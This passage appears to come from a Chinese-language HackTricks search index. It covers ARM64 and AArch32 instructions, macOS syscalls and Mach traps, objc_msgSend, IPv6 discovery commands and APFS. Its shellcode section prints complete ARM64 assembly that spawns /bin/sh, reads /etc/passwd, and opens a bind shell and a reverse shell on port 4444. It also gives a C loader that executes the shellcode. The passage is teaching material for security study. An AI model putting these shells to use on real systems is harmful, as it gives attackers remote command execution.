位,对其进行符号扩展,并放入 X1 UBFIZ X1, X2, #3, #4 对 X2 的 4 位进行零扩展并从位 3 开始插入到 X1,同时将右侧位清零 UBFX X1, X2, #3, #4 从 X2 的第 3 位开始提取 4 位并将零扩展后的结果放入 X1。 符号扩展到 X(Sign Extend To X) :对值做符号扩展(或无符号情况下填 0)以便进行后续操作: SXTB X1, W2 将 W2 的一个字节的符号扩展到 X1(将 W2 的值扩展到 64 位) SXTH X1, W2 将 W2 的 16 位数符号扩展到 X1 SXTW X1, W2 将 W2 的 32 位数符号扩展到 X1 UXTB X1, W2 对 W2 的一个字节进行零扩展并放入 X1 extr :从指定的两个寄存器连接后的位对中提取位。 示例:EXTR W3, W2, W1, #3 将 W1+W2 进行连接并从 W2 的第 3 位到 W1 的第 3 位提取位并存入 W3。 cmp :比较两个寄存器并设置条件标志。它是 subs 的别名,将目标寄存器设为零寄存器。用于判断 m == n。 它支持与 subs 相同的语法。 示例:cmp x0, x1 — 比较 x0 与 x1 并相应设置条件标志。 cmn :比较负操作数。在这种情况下它是 adds 的别名,支持相同语法。用于判断 m == -n。 ccmp :条件比较,仅当先前的比较为真时才执行并专门设置 
nzcv 位。 cmp x1, x2; ccmp x3, x4, 0, NE; blt _func -> 如果 x1 != x2 且 x3 < x4,则跳转到 func 这是因为 ccmp 只有在先前 cmp 为 NE 时才会执行,否则 nzcv 位将被置为 0(这不会满足 blt 比较)。 此外还可以用作 ccmn(同理,但为负,如 cmp 与 cmn 的区别)。 tst :对两个操作数执行按位与并据此设置条件标志,但不存储结果(等同于 ANDS 且目标为零寄存器)。用于检查寄存器与某值按位与后是否有任何位为 1。 示例:tst X1, #7 检查 X1 的最低 3 位是否有任一为 1 teq :执行 XOR 操作并丢弃结果 b :无条件分支 示例:b myFunction 注意:这不会将返回地址写入链接寄存器(不适合需要返回的子例程调用) bl :带链接的分支,用于调用子例程。将返回地址存入 x30。 示例:bl myFunction — 调用 myFunction 并将返回地址存入 x30。 blr :带链接到寄存器的分支,用于调用目标地址存于寄存器中的子例程。将返回地址存入 x30。 示例:blr x1 — 调用位于 x1 中的函数地址并将返回地址存入 x30。 ret :从子例程返回,通常使用 x30 中的地址。 示例:ret — 使用 x30 中的返回地址从当前子例程返回。 b. :条件分支 b.eq :若相等则分支,基于上一次的 cmp 指令。 示例:b.eq label — 如果上一条 cmp 指令发现两个值相等,则跳转到 label。 b.ne :若不相等则分支。该指令检查由之前的比较指令设置的条件标志,若比较值不等则分支到指定标签或地址。 示例:在 cmp x0, x1 后,b.ne label — 如果 x0 与 x1 不相等,则跳转到 label。 cbz :比较并在为零时分支。该指令将寄存器与零比较,若相等则分支。 示例:cbz x0, label — 如果 x0 的值为零,则跳转到 label。 cbnz :比较并在非零时分支。该指令将寄存器与零比较,若不相等则分支。 示例:cbnz x0, label — 如果 x0 非零,则跳转到 label。 tbnz :测试位并在非零时分支 示例:tbnz x0, #8, label tbz :测试位并在为零时分支 示例:tbz x0, #8, label 条件选择操作(Conditional select operations) :这些操作的行为基于条件位而变化。 csel Xd, Xn, Xm, cond -> csel X0, X1, X2, EQ -> 若为真,X0 = X1,若为假,X0 = X2 csinc Xd, Xn, Xm, cond -> 若为真,Xd = Xn,若为假,Xd = Xm + 1 cinc Xd, Xn, cond -> 若为真,Xd = Xn + 1,若为假,Xd = Xn csinv Xd, Xn, Xm, cond -> 若为真,Xd = Xn,若为假,Xd = NOT(Xm) cinv Xd, Xn, cond -> 若为真,Xd = NOT(Xn),若为假,Xd = Xn csneg Xd, Xn, Xm, cond -> 若为真,Xd = Xn,若为假,Xd = -Xm cneg Xd, Xn, cond -> 若为真,Xd = -Xn,若为假,Xd = Xn cset Xd, cond -> 若为真,Xd = 1,若为假,Xd = 0 csetm Xd, cond -> 若为真,Xd = 全 1(即 -1),若为假,Xd = 0 adrp :计算符号的页地址并将其存入寄存器。 示例:adrp x0, symbol — 计算 symbol 的页地址并存入 x0。 ldrsw :从内存加载带符号的 32-bit 值并将其符号扩展到 64 位。 示例:ldrsw x0, [x1] — 从 x1 指向的内存位置加载一个带符号的 32-bit 值,符号扩展到 64 位并存入 x0。 stur :将寄存器值存到以另一个寄存器为基址并带偏移的内存位置。 示例:stur x0, [x1, #4] — 将 x0 的值存入地址为 x1 + 4 的内存位置。 svc :发起系统调用。代表 “Supervisor Call”。当处理器执行此指令时,会 从用户模式切换到内核模式 并跳转到内核系统调用处理代码所在的指定内存位置。 示例: armasm mov x8, 93 ; Load the system call number for exit 
(93) into register x8.\\nmov x0, 0 ; Load the exit status code (0) into register x0.\\nsvc 0 ; Make the system call.","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » 常见指令 (ARM64v8)","id":"2106","title":"常见指令 (ARM64v8)"},"2107":{"body":"将链接寄存器和帧指针保存到栈中 : armasm stp x29, x30, [sp, #-16]! ; store pair x29 and x30 to the stack and decrement the stack pointer 设置新的帧指针 : mov x29, sp (为当前函数设置新的帧指针) 为局部变量在栈上分配空间 (如有需要): sub sp, sp, #N (其中 N 是所需的字节数,且应保持 sp 16 字节对齐)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » 函数序言(Function Prologue)","id":"2107","title":"函数序言(Function Prologue)"},"2108":{"body":"释放局部变量(如果有分配) : add sp, sp, #N (与序言中分配的字节数相同) 恢复链接寄存器和帧指针 : armasm ldp x29, x30, [sp], #16 ; load pair x29 and x30 from the stack and increment the stack pointer Return : ret (将控制权返回给调用者,使用链接寄存器中的地址)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » 函数尾部","id":"2108","title":"函数尾部"},"2109":{"body":"Armv8-A 支持执行 32 位程序。 AArch32 可以在 两种指令集 之一运行: A32 和 T32 ,并可通过 interworking 在它们之间切换。 Privileged 64-bit 程序可以通过执行异常级别转移到较低特权的 32 位来安排 32-bit 程序的执行。 注意,从 64 位到 32 位的转换发生在较低的异常级别(例如在 EL1 的 64 位程序触发 EL0 的程序)。这是通过在 AArch32 进程线程准备执行时,将 SPSR_ELx 特殊寄存器的 第 4 位 设置为 1 来完成的,SPSR_ELx 的其余部分保存 AArch32 程序的 CPSR。然后,特权进程调用 ERET 指令,使处理器切换到 AArch32 ,并根据 CPSR 进入 A32 或 T32。 interworking 通过 CPSR 的 J 和 T 位实现。 J=0 且 T=0 表示 A32 ,J=0 且 T=1 表示 T32 。这基本上等同于将 最低位设置为 1 以指示指令集为 T32。 这在 interworking branch instructions 期间设置,但在将 PC 作为目的寄存器时,也可以通过其他指令直接设置。示例: 另一个示例: armasm _start:\\n.code 32 ; Begin using A32\\nadd r4, pc, #1 ; Here PC is already pointing to \\"mov r0, #0\\"\\nbx r4 ; Swap to T32 mode: Jump to \\"mov r0, #0\\" + 1 (so T32) .code 16:\\nmov r0, #0\\nmov r0, #8","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » AARCH32 
Execution State","id":"2109","title":"AARCH32 Execution State"},"211":{"body":"要与 IPv6 网络交互,可以使用各种命令: Ping 链路本地地址 :使用 ping6 检查本地设备的存在。 邻居发现 :使用 ip neigh 查看在链路层发现的设备。 alive6 :用于发现同一网络上设备的替代工具。 以下是一些命令示例: bash ping6 –I eth0 -c 5 ff02::1 > /dev/null 2>&1\\nip neigh | grep ^fe80 # Alternatively, use alive6 for neighbor discovery\\nalive6 eth0 IPv6 地址可以从设备的 MAC 地址派生,用于本地通信。以下是如何从已知的 MAC 地址派生链路本地 IPv6 地址的简化指南,以及对 IPv6 地址类型和在网络中发现 IPv6 地址的方法的简要概述。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » IPv6 在网络命令中的实际使用","id":"211","title":"IPv6 在网络命令中的实际使用"},"2110":{"body":"有 16 个 32 位寄存器 (r0-r15)。 从 r0 到 r14 它们可以用于 任何操作 ,不过其中一些通常被保留: r15 : Program counter (always). Contains the address of the next instruction. In A32 current + 8, in T32, current + 4. r11 : Frame Pointer r12 : Intra-procedural call register r13 : Stack Pointer (Note the stack is always 16-byte aligned) r14 : Link Register 此外,寄存器会备份到 banked registries 。这些位置存储寄存器的值,允许在异常处理和特权操作中执行 快速上下文切换 ,避免每次都手动保存和恢复寄存器。 这是通过 将处理器状态从 CPSR 保存到被转入异常的处理器模式的 SPSR 来完成的。在异常返回时, CPSR 会从 SPSR 恢复。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » 寄存器","id":"2110","title":"寄存器"},"2111":{"body":"在 AArch32 中,CPSR 的作用类似于 AArch64 中的 PSTATE ,并且当发生异常时也会存储到 SPSR_ELx 以便稍后恢复执行: 这些字段分为几类: Application Program Status Register (APSR):算术标志,可从 EL0 访问 Execution State Registers:处理器行为(由操作系统管理) Application Program Status Register (APSR)(应用程序状态寄存器) N 、 Z 、 C 、 V 标志(与 AArch64 相同) Q 标志:当在执行专用饱和算术指令期间发生 整数饱和 时会被置为 1。一旦被置为 1 ,它会保持该值直到手动清零。此外,没有任何指令会隐式检查其值,必须手动读取来检查。 GE (Greater than or equal)标志:用于 SIMD(单指令多数据)操作,例如“并行加”和“并行减”。这些操作允许在单条指令中处理多个数据点。 例如, UADD8 指令 并行地对两个 32 位操作数的四对字节相加 ,并将结果存入一个 32 位寄存器。它随后根据这些结果 在 APSR 中设置 GE 标志 。每个 GE 标志对应其中一对字节的相加,指示该字节对的相加是否 溢出 。 SEL 指令使用这些 GE 标志来执行条件动作。 Execution State Registers(执行状态寄存器) J 和 T 位: J 应为 0,若 T 为 0 则使用 A32 指令集,若为 1 则使用 T32。 IT Block State Register (ITSTATE):这些是位 10-15 和 25-26。它们存储 IT 前缀组内指令的条件。 E 位:表示 字节序(endianness) 。 
模式和异常屏蔽位(0-4):它们决定当前的执行状态。第 5 位指示程序是以 32bit(为 1)还是 64bit(为 0)运行。其它 4 位表示 当前使用的异常模式 (当发生异常并被处理时)。设置的数值 表示当前优先级 ,以防在处理期间触发另一个异常。 AIF :某些异常可以使用位 A 、I、F 来禁用。如果 A 为 1,表示将触发 异步中止(asynchronous aborts) 。 I 配置用于响应外部硬件 中断请求 (IRQs),而 F 与 快速中断请求 (FIRs)相关。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » CPSR - Current Program Status Register","id":"2111","title":"CPSR - Current Program Status Register"},"2112":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » macOS","id":"2112","title":"macOS"},"2113":{"body":"查看 syscalls.master 或运行 cat /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/include/sys/syscall.h。BSD syscalls 的 x16 会大于 0( x16 > 0 )。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » BSD syscalls","id":"2113","title":"BSD syscalls"},"2114":{"body":"在 syscall_sw.c 中查看 mach_trap_table,在 mach_traps.h 中查看原型。Mach traps 的最大数量是 MACH_TRAP_TABLE_COUNT = 128。Mach traps 的 x16 会小于 0( x16 < 0 ),所以你需要对前面列表中的编号加上 负号 来调用: _kernelrpc_mach_vm_allocate_trap 是 -10 。 你也可以在反汇编器中检查 libsystem_kernel.dylib 来找出如何调用这些(以及 BSD)syscalls: bash # macOS\\ndyldex -e libsystem_kernel.dylib /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e # iOS\\ndyldex -e libsystem_kernel.dylib /System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64 Note that Ida and Ghidra can also decompile specific dylibs from the cache just by passing the cache. 
tip 有时直接查看 libsystem_kernel.dylib 的 反编译 代码比查看 源代码 更容易,因为多个 syscalls(BSD 和 Mach)的代码是通过脚本生成的(查看源代码中的注释),而在 dylib 中你可以找到实际被调用的内容。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » Mach Traps","id":"2114","title":"Mach Traps"},"2115":{"body":"XNU 支持另一类称为 machine dependent 的调用。这些调用的编号依赖于架构,调用本身和编号都不保证保持不变。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » machdep calls","id":"2115","title":"machdep calls"},"2116":{"body":"这是一个由内核拥有的内存页,会映射到每个用户进程的地址空间。其目的是对于那些非常频繁使用的 kernel services,使从用户态到内核态的过渡比通过 syscalls 更快,否则该过渡会非常低效。 For example the call gettimeofdate reads the value of timeval directly from the comm page.","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » comm page","id":"2116","title":"comm page"},"2117":{"body":"It\'s super common to find this function used in Objective-C or Swift programs. This function allows to call a method of an objective-C object. Parameters ( more info in the docs ): x0: self -> Pointer to the instance x1: op -> Selector of the method x2... 
-> Rest of the arguments of the invoked method So, if you put breakpoint before the branch to this function, you can easily find what is invoked in lldb with (in this example the object calls an object from NSConcreteTask that will run a command): bash # Right in the line were objc_msgSend will be called\\n(lldb) po $x0\\n (lldb) x/s $x1\\n0x1736d3a6e: \\"launch\\" (lldb) po [$x0 launchPath]\\n/bin/sh (lldb) po [$x0 arguments]\\n<__NSArrayI 0x1736801e0>(\\n-c,\\nwhoami\\n) tip 设置环境变量 NSObjCMessageLoggingEnabled=1 ,可以将此函数何时被调用记录到像 /tmp/msgSends-pid 这样的文件中。 此外,设置 OBJC_HELP=1 并调用任意二进制,你可以看到其他可用于 记录 某些 Objc-C 操作何时发生的环境变量。 当调用此函数时,需要找到被指定实例调用的方法,为此会进行多种不同的查找: 执行乐观的缓存查找: 如果成功,则完成 获取 runtimeLock (read) 如果 (realize && !cls->realized) realize class 如果 (initialize && !cls->initialized) initialize class 尝试类自身的缓存: 如果成功,则完成 尝试类的方法列表: 如果找到,则填充缓存并完成 尝试父类缓存: 如果成功,则完成 尝试父类的方法列表: 如果找到,则填充缓存并完成 如果 (resolver) 尝试 method resolver,并从 class lookup 处重复 如果仍然到此(= 所有其它方法都失败)则尝试 forwarder","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » objc_msgSend","id":"2117","title":"objc_msgSend"},"2118":{"body":"To compile: bash as -o shell.o shell.s\\nld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib # You could also use this\\nld -o shell shell.o -syslibroot $(xcrun -sdk macosx --show-sdk-path) -lSystem 要提取字节: bash # Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/b729f716aaf24cbc8109e0d94681ccb84c0b0c9e/helper/extract.sh\\nfor c in $(objdump -d \\"s.o\\" | grep -E \'[0-9a-f]+:\' | cut -f 1 | cut -d : -f 2) ; do\\necho -n \'\\\\\\\\x\'$c\\ndone 对于较新的 macOS: bash # Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/fc0742e9ebaf67c6a50f4c38d59459596e0a6c5d/helper/extract.sh\\nfor s in $(objdump -d \\"s.o\\" | grep -E \'[0-9a-f]+:\' | cut -f 1 | cut -d : -f 2) ; do\\necho -n $s | awk \'{for (i = 7; i > 0; i -= 2) {printf 
\\"\\\\\\\\x\\" substr($0, i, 2)}}\'\\ndone 用于测试 shellcode 的 C 代码\\nc // code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c\\n// gcc loader.c -o loader\\n#include \\n#include \\n#include \\n#include int (*sc)(); char shellcode[] = \\"\\"; int main(int argc, char **argv) {\\nprintf(\\"[>] Shellcode Length: %zd Bytes\\\\n\\", strlen(shellcode)); void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0); if (ptr == MAP_FAILED) {\\nperror(\\"mmap\\");\\nexit(-1);\\n}\\nprintf(\\"[+] SUCCESS: mmap\\\\n\\");\\nprintf(\\" |-> Return = %p\\\\n\\", ptr); void *dst = memcpy(ptr, shellcode, sizeof(shellcode));\\nprintf(\\"[+] SUCCESS: memcpy\\\\n\\");\\nprintf(\\" |-> Return = %p\\\\n\\", dst); int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ); if (status == -1) {\\nperror(\\"mprotect\\");\\nexit(-1);\\n}\\nprintf(\\"[+] SUCCESS: mprotect\\\\n\\");\\nprintf(\\" |-> Return = %d\\\\n\\", status); printf(\\"[>] Trying to execute shellcode...\\\\n\\"); sc = ptr;\\nsc(); return 0;\\n} Shell 取自 here 并予以说明。 with adr\\nwith stack\\nwith adr for linux armasm .section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.\\n.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.\\n.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4). _main:\\nadr x0, sh_path ; This is the address of \\"/bin/sh\\".\\nmov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve.\\nmov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve.\\nmov x16, #59 ; Move the execve syscall number (59) into x16.\\nsvc #0x1337 ; Make the syscall. 
The number 0x1337 doesn\'t actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16. sh_path: .asciz \\"/bin/sh\\" armasm .section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.\\n.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.\\n.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4). _main:\\n; We are going to build the string \\"/bin/sh\\" and place it on the stack. mov x1, #0x622F ; Move the lower half of \\"/bi\\" into x1. 0x62 = \'b\', 0x2F = \'/\'.\\nmovk x1, #0x6E69, lsl #16 ; Move the next half of \\"/bin\\" into x1, shifted left by 16. 0x6E = \'n\', 0x69 = \'i\'.\\nmovk x1, #0x732F, lsl #32 ; Move the first half of \\"/sh\\" into x1, shifted left by 32. 0x73 = \'s\', 0x2F = \'/\'.\\nmovk x1, #0x68, lsl #48 ; Move the last part of \\"/sh\\" into x1, shifted left by 48. 0x68 = \'h\'. str x1, [sp, #-8] ; Store the value of x1 (the \\"/bin/sh\\" string) at the location `sp - 8`. ; Prepare arguments for the execve syscall. mov x1, #8 ; Set x1 to 8.\\nsub x0, sp, x1 ; Subtract x1 (8) from the stack pointer (sp) and store the result in x0. This is the address of \\"/bin/sh\\" string on the stack.\\nmov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve.\\nmov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve. ; Make the syscall. mov x16, #59 ; Move the execve syscall number (59) into x16.\\nsvc #0x1337 ; Make the syscall. The number 0x1337 doesn\'t actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16. 
armasm ; From https://8ksec.io/arm64-reversing-and-exploitation-part-5-writing-shellcode-8ksec-blogs/\\n.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.\\n.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.\\n.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4). _main:\\nadr x0, sh_path ; This is the address of \\"/bin/sh\\".\\nmov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve.\\nmov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve.\\nmov x16, #59 ; Move the execve syscall number (59) into x16.\\nsvc #0x1337 ; Make the syscall. The number 0x1337 doesn\'t actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16. sh_path: .asciz \\"/bin/sh\\" 使用 cat 读取 目标是执行 execve(\\"/bin/cat\\", [\\"/bin/cat\\", \\"/etc/passwd\\"], NULL),因此第二个参数(x1)是一个参数数组(在内存中这意味着一个地址栈)。 armasm .section __TEXT,__text ; Begin a new section of type __TEXT and name __text\\n.global _main ; Declare a global symbol _main\\n.align 2 ; Align the beginning of the following code to a 4-byte boundary _main:\\n; Prepare the arguments for the execve syscall\\nsub sp, sp, #48 ; Allocate space on the stack\\nmov x1, sp ; x1 will hold the address of the argument array\\nadr x0, cat_path\\nstr x0, [x1] ; Store the address of \\"/bin/cat\\" as the first argument\\nadr x0, passwd_path ; Get the address of \\"/etc/passwd\\"\\nstr x0, [x1, #8] ; Store the address of \\"/etc/passwd\\" as the second argument\\nstr xzr, [x1, #16] ; Store NULL as the third argument (end of arguments) adr x0, cat_path\\nmov x2, xzr ; Clear x2 to hold NULL (no environment variables)\\nmov x16, #59 ; Load the syscall number for execve (59) into x8\\nsvc 0 ; Make the 
syscall cat_path: .asciz \\"/bin/cat\\"\\n.align 2\\npasswd_path: .asciz \\"/etc/passwd\\" 通过 fork 使用 sh 调用命令,以便主进程不被杀死 armasm .section __TEXT,__text ; Begin a new section of type __TEXT and name __text\\n.global _main ; Declare a global symbol _main\\n.align 2 ; Align the beginning of the following code to a 4-byte boundary _main:\\n; Prepare the arguments for the fork syscall\\nmov x16, #2 ; Load the syscall number for fork (2) into x8\\nsvc 0 ; Make the syscall\\ncmp x1, #0 ; In macOS, if x1 == 0, it\'s parent process, https://opensource.apple.com/source/xnu/xnu-7195.81.3/libsyscall/custom/__fork.s.auto.html\\nbeq _loop ; If not child process, loop ; Prepare the arguments for the execve syscall sub sp, sp, #64 ; Allocate space on the stack\\nmov x1, sp ; x1 will hold the address of the argument array\\nadr x0, sh_path\\nstr x0, [x1] ; Store the address of \\"/bin/sh\\" as the first argument\\nadr x0, sh_c_option ; Get the address of \\"-c\\"\\nstr x0, [x1, #8] ; Store the address of \\"-c\\" as the second argument\\nadr x0, touch_command ; Get the address of \\"touch /tmp/lalala\\"\\nstr x0, [x1, #16] ; Store the address of \\"touch /tmp/lalala\\" as the third argument\\nstr xzr, [x1, #24] ; Store NULL as the fourth argument (end of arguments) adr x0, sh_path\\nmov x2, xzr ; Clear x2 to hold NULL (no environment variables)\\nmov x16, #59 ; Load the syscall number for execve (59) into x8\\nsvc 0 ; Make the syscall _exit:\\nmov x16, #1 ; Load the syscall number for exit (1) into x8\\nmov x0, #0 ; Set exit status code to 0\\nsvc 0 ; Make the syscall _loop: b _loop sh_path: .asciz \\"/bin/sh\\"\\n.align 2\\nsh_c_option: .asciz \\"-c\\"\\n.align 2\\ntouch_command: .asciz \\"touch /tmp/lalala\\" Bind shell Bind shell 来自 https://raw.githubusercontent.com/daem0nc0re/macOS_ARM64_Shellcode/master/bindshell.s ,在 port 4444 armasm .section __TEXT,__text\\n.global _main\\n.align 2\\n_main:\\ncall_socket:\\n// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0)\\nmov x16, #97\\nlsr 
x1, x16, #6\\nlsl x0, x1, #1\\nmov x2, xzr\\nsvc #0x1337 // save s\\nmvn x3, x0 call_bind:\\n/*\\n* bind(s, &sockaddr, 0x10)\\n*\\n* struct sockaddr_in {\\n* __uint8_t sin_len; // sizeof(struct sockaddr_in) = 0x10\\n* sa_family_t sin_family; // AF_INET = 2\\n* in_port_t sin_port; // 4444 = 0x115C\\n* struct in_addr sin_addr; // 0.0.0.0 (4 bytes)\\n* char sin_zero[8]; // Don\'t care\\n* };\\n*/\\nmov x1, #0x0210\\nmovk x1, #0x5C11, lsl #16\\nstr x1, [sp, #-8]\\nmov x2, #8\\nsub x1, sp, x2\\nmov x2, #16\\nmov x16, #104\\nsvc #0x1337 call_listen:\\n// listen(s, 2)\\nmvn x0, x3\\nlsr x1, x2, #3\\nmov x16, #106\\nsvc #0x1337 call_accept:\\n// c = accept(s, 0, 0)\\nmvn x0, x3\\nmov x1, xzr\\nmov x2, xzr\\nmov x16, #30\\nsvc #0x1337 mvn x3, x0\\nlsr x2, x16, #4\\nlsl x2, x2, #2 call_dup:\\n// dup(c, 2) -> dup(c, 1) -> dup(c, 0)\\nmvn x0, x3\\nlsr x2, x2, #1\\nmov x1, x2\\nmov x16, #90\\nsvc #0x1337\\nmov x10, xzr\\ncmp x10, x2\\nbne call_dup call_execve:\\n// execve(\\"/bin/sh\\", 0, 0)\\nmov x1, #0x622F\\nmovk x1, #0x6E69, lsl #16\\nmovk x1, #0x732F, lsl #32\\nmovk x1, #0x68, lsl #48\\nstr x1, [sp, #-8]\\nmov x1, #8\\nsub x0, sp, x1\\nmov x1, xzr\\nmov x2, xzr\\nmov x16, #59\\nsvc #0x1337 Reverse shell 从 https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/reverseshell.s ,revshell 到 127.0.0.1:4444 armasm .section __TEXT,__text\\n.global _main\\n.align 2\\n_main:\\ncall_socket:\\n// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0)\\nmov x16, #97\\nlsr x1, x16, #6\\nlsl x0, x1, #1\\nmov x2, xzr\\nsvc #0x1337 // save s\\nmvn x3, x0 call_connect:\\n/*\\n* connect(s, &sockaddr, 0x10)\\n*\\n* struct sockaddr_in {\\n* __uint8_t sin_len; // sizeof(struct sockaddr_in) = 0x10\\n* sa_family_t sin_family; // AF_INET = 2\\n* in_port_t sin_port; // 4444 = 0x115C\\n* struct in_addr sin_addr; // 127.0.0.1 (4 bytes)\\n* char sin_zero[8]; // Don\'t care\\n* };\\n*/\\nmov x1, #0x0210\\nmovk x1, #0x5C11, lsl #16\\nmovk x1, #0x007F, lsl #32\\nmovk x1, #0x0100, lsl #48\\nstr x1, [sp, 
#-8]\\nmov x2, #8\\nsub x1, sp, x2\\nmov x2, #16\\nmov x16, #98\\nsvc #0x1337 lsr x2, x2, #2 call_dup:\\n// dup(s, 2) -> dup(s, 1) -> dup(s, 0)\\nmvn x0, x3\\nlsr x2, x2, #1\\nmov x1, x2\\nmov x16, #90\\nsvc #0x1337\\nmov x10, xzr\\ncmp x10, x2\\nbne call_dup call_execve:\\n// execve(\\"/bin/sh\\", 0, 0)\\nmov x1, #0x622F\\nmovk x1, #0x6E69, lsl #16\\nmovk x1, #0x732F, lsl #32\\nmovk x1, #0x68, lsl #48\\nstr x1, [sp, #-8]\\nmov x1, #8\\nsub x0, sp, x1\\nmov x1, xzr\\nmov x2, xzr\\nmov x16, #59\\nsvc #0x1337 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » Shellcodes","id":"2118","title":"Shellcodes"},"2119":{"body":"Reading time: 4 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS AppleFS » macOS AppleFS","id":"2119","title":"macOS AppleFS"},"212":{"body":"给定一个 MAC 地址 12:34:56:78:9a:bc ,可以按如下方式构造链路本地 IPv6 地址: 将 MAC 转换为 IPv6 格式: 1234:5678:9abc 在前面加上 fe80:: 并在中间插入 fffe: fe80::1234:56ff:fe78:9abc 反转左侧的第七位,将 1234 改为 1034: fe80::1034:56ff:fe78:9abc","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 从 MAC 地址派生链路本地 IPv6","id":"212","title":"从 MAC 地址派生链路本地 IPv6"},"2120":{"body":"Apple 文件系统 (APFS) 是一种现代文件系统,旨在取代层次文件系统 Plus (HFS+)。其开发是为了满足 提高性能、安全性和效率 的需求。 APFS 的一些显著特性包括: 空间共享 :APFS 允许多个卷 共享同一物理设备上的底层可用存储 。这使得空间利用更加高效,因为卷可以动态增长和缩小,而无需手动调整大小或重新分区。 这意味着,与传统的文件磁盘分区相比, 在 APFS 中,不同的分区(卷)共享所有磁盘空间 ,而常规分区通常具有固定大小。 快照 :APFS 支持 创建快照 ,这些快照是 只读的 、时间点实例的文件系统。快照使得高效备份和轻松系统回滚成为可能,因为它们消耗的额外存储极少,并且可以快速创建或恢复。 克隆 :APFS 可以 创建文件或目录克隆,这些克隆与原始文件共享相同的存储 ,直到克隆或原始文件被修改。此功能提供了一种高效的方式来创建文件或目录的副本,而无需重复存储空间。 加密 :APFS 原生支持全盘加密 以及逐文件和逐目录加密,增强了不同使用场景下的数据安全性。 崩溃保护 :APFS 使用 写时复制元数据方案,确保文件系统的一致性 ,即使在突然断电或系统崩溃的情况下,也能减少数据损坏的风险。 总体而言,APFS 为 Apple 设备提供了一种更现代、更灵活和更高效的文件系统,重点在于提高性能、可靠性和安全性。 bash diskutil list # Get overview of the APFS volumes","breadcrumbs":"macOS Security & Privilege Escalation » macOS AppleFS » Apple 专有文件系统 (APFS)","id":"2120","title":"Apple 专有文件系统 (APFS)"},"2121":{"body":"Data 卷挂载在 /System/Volumes/Data (您可以使用 diskutil apfs list 